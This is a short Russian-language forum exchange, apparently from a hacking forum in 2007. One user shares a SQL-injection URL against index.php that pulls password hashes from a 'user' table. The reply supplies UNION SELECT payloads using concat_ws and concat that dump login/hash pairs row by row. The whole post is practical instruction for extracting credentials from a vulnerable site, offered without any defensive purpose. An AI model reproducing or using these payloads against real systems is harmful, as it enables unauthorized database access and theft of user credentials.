29.12.2007, 16:35
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
Сообщение от Op3r
Такой вопрос
index.php?kat=2&kp=-39+union+select+(pass)+from+user+limit+0,1/*
Таким запросом я могу просматривать хэши, меняя только значения limit,
а каким запросом можно перемаслать Юзверей?
Ты имеешь ввиду логины ?
ну например так
index.php?kat=2&kp=-39+union+select+ concat_ws(0x2F,login,pass)+from+user+limit+0,1/*
вывод будет логин/хеш
или так
index.php?kat=2&kp=-39+union+select+ concat(login,0x2F,pass)+from+user+limit+0,1/*
вывод будет такой же
|
|
|